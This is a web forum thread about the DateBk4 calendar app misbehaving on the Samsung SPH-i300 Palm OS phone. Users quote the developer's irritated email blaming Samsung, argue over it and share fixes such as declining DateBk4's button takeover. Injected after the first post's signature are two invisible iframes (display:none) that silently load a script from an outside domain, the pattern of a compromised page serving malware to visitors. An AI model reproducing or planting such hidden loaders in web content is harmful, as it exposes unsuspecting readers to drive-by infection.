+ Reply to Thread
Page 1 of 2 1 2 LastLast

Thread: Datebook 4

More on DateBk 4

I recently sent an email to the developer of DateBk 4, Pimlico. Below is the email that I sent to them, and their response:

=========================================
    My email:

I recently purchased the Samsung SPH-I300 phone. I had DateBK 4, version e
    loaded. When I hotsync for the first time, everything loaded properly.
    Then I noticed that the power button for my phone would not work any longer.
    I figured the problem was with DateBk 4, because I had been reading on a
    forum that there was a problem with this S/W and the Samsung SPH-I300 phone.
    So I deleted DateBk 4 and performed a warm reset. That solved the problem,
    and my phone button is now functioning again.

My problem, is that I really enjoy using DateBk 4. I thought perhaps
    version e, would have taken care of this bug. Obviously it hasn't. Is
    there any way this bug can be fixed?? I really like DateBk 4, and would
    like to continue using it.

===============================
    Their response:

Well this is obviously not a bug in DateBk4. There is no problem on EVERY
    other Palm OS device that has ever shipped and neither would there be with a
    device where the Palm OS was properly implemented.

The problem is the Samsung phone is *NOT* a proper Palm OS device and is
    clearly violating the rules of the Palm OS. Unfortunately, Samsung has seen
    fit to totally ignore developers and have released NO INFORMATION whatsoever
    on what they are doing with their proprietary software.

SO for now, I can't even address any issues with this device. My
    DateBk3/DateBK4/DateBook+ are installed on close to three MILLION Palm OS
    devices - probably 10 to 20 times as many phones as Samsung will ship this
    year and next (maybe will ever ship), so they had better learn quickly to
    start documenting what they're doing if they want their customers to be able
    to reliably run any sophisticated third party software.

If at any time Samsung decides not to ignore the 100,000+ Palm OS
    developers, then maybe something will get done. IN the meantime, I am
    waiting for some power users to come along who can perform some diagnostic
    tests which may help determine what on earth they have done to the Palm OS
    to cause these kinds of problems.

I had also thought that I might buy a Palm OS phone, although I would never
    buy a device that clearly has not followed the Palm OS guidelines properly -
    the Kyocera phone seems to have been handled better in that respect,
    although they too have not documented everything they have done (but at
    least they have a developers kit and have documented some of the more
    important things they have done).

======================================

What does anyone think about the S/W developers response??

Laurie<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

seems very defensive and arrogant....

Brooks

Yeah, how can it be Samsung's fault? The device works fine -- just not with YOUR software. I understand his point about not releasing info, but he's got to realize that you don't spend a few hundred million dollars on software only to release it to the whole world.

I completely agree with the developer. Being a developer myself, it is frustrating when you want to develop software for a cool new toy, and there is absolutely *NO* information on things the creators of the device might have done to break it from any standards.

Samsung touts that they are a *PALM PILOT* phone. Which infers that they should work like any other palm pilot that you would buy in a store -- which it obviously does not, because of undocumented modifications to the underlying Palm OS.

I would be pretty pissed off if I bought some software for say, Windows 2000 which says it is "Windows Compatible" and then doesn't work under ME, or some other hybrid, especially if Microsoft didn't provide information on the changes.

Samsung, get off your butts! Let's see an API and make this the best PDA/Cell phone out there!

I think the guy sounds like a jerk!

Talking

In defense of the DateBk4 developer(s) Pimlico Software:

Since I have had my SPH-i300, I've written to more than 10 different developers who publish popular PalmOS apps or new hardware and asked if they will support the 160x240 screen or develop keyboards etc.... (regarding this issue most have a wait and see approach to the i300. Samsung hasn't released their SDK to take advantage of this larger screen - the only app utilizing it being Samsung's "Phone") Many didn't respond, a few responded after 1 week, but the response was almost always a single line: "we'll look into it". But the Datebk4 developers responded that same evening with a few paragraphs of explanation and yet, I wasn't even a customer! So within the next few days I had 4 personalized emails addressing bugs I discovered or potential new features I requested to be implemented into Datebk4.

I think the Pilimco Software developers have been exemplary in supporting us, the users. If this particular developer sounded gruff at all it was really aimed at Samsung and it's proprietary code, not you or I.

I have been a happy DateBk4 customer and support Pimlico Software wholeheartedly.

Liner

Lightbulb

I was extremely surprised when I read the reply from the developer. I have used DateBk 3 or 4, for a couple of years. I have always been satisfied, and have never had any problems with the software.

It seemed to me there is a struggle going on between Pimlico and Samsung. And perhaps Pimlico was expressing their frustrations in the response.

Maybe someone else who is also having the same problem with DateBk 4 could write Pimlico and see what response they get. If enough people tell them about this problem, maybe they will look into fixing it.

Laurie

maybe Samsung will help out..... I know that they are reading through this forum......

Brooks

I'm getting my I300 either today or tomorrow ($419 at Circuit City and Best Buy), and I've been a DateBook since I've had my Palm IIIx. The developer has always been extremely courteous when I've...lost the registration email...had a question...and had a implementation suggestion....

I agree with the earlier writer who said he's probably frustrated with Samsung, not you.
    oh, you're supposed to READ the manual....

I am running DateBk4 version 4.0e. I sometimes require a software reset after hot syncing. The operative word is "sometimes". I am running a lot of 3rd party apps so I'm still not convinced that DateBk4 is the problem.

i always had to do a soft reset from day one and datebook 4 was my app installed,last week i uninstall it and now no more reset
    Marc-André Pïlon

I'm running DateBK4 and had this problem, but for some reason, I'm reset-free now.

The problem might be related to DateBK4, but it appears that this piece of software is not causing this issue by itself.

Datebk4 version 4.0f released. I scanned through the readme and did not see anything regarding a hot sync problem or fix.

I removed the DateBk4 application and my post-hotsync problems have been eliminated.

Now, I'm convinced. I will also write the developer to see if pestering can result in a bug-fix.

Regards,

Sam

Datebook 4

I just ordered my I300 after reading about it on this forum...decided that I wouldn't wait for the color Treo.

Any ways, I was wondering if DateBook4 will work on the I300?

How does it work with the phone?

Thanks for the info

Regards,

Back in November belarocks wrote:

I use Datebk4 without any problem. I switched from the prism myself.

Not working for me

I just installed it and can predicably cause a crash by clicking on the day view calender time. It brings up a window to change the time of the appt, and as soon as I close it.... Crash-Reset.

This is the only one I've found so far. I may keep using it for a bit to see if is otherwise stable, just need to remeber not to do this during a call!

Too bad this situation will persist as Samsung will not release their source code to the third party develpers. I really like Silver Screen but can't use it because it interferes with the phone voicedial / voicememo button.

This may be a little bit of help

Originally posted by jgermuga
    I just installed it and can predicably cause a crash by clicking on the day view calender time. It brings up a window to change the time of the appt, and as soon as I close it.... Crash-Reset.
    There's a hack called Crash at http://www.dseifert.com/crash/ that supposedly can catch a crashed program and reset the palm for you after X number of seconds. Saves you from having to take off the end of your pen or find a paper clip to hit the reset button. If it does work, it's also good since you don't have to remove the i300 from the case to hit the reset button.

I don't have any apps that I predictibly crash so I haven't been able to try it.

l8r
    tom

Works, with one problem so far

I've gotten Datebk4.0f working, but one problem remains. After hotsyncing this morning, the phone button on the side (next to the power button), no longer works. I have to get to the phone from the launcher.

Not sure if the problem is with the Samsung, with Datebk4, or with both. I haven't tried to uninstall Datebk4 yet to see if the button comes back to life.

Rich

Its from DateBK4. I had the same problem, it occurs when it asks you if you want DateBK4 to take over the buttons on your phone. Delete it and reinstall and select NO on that option, then set it up yourself instead.

D.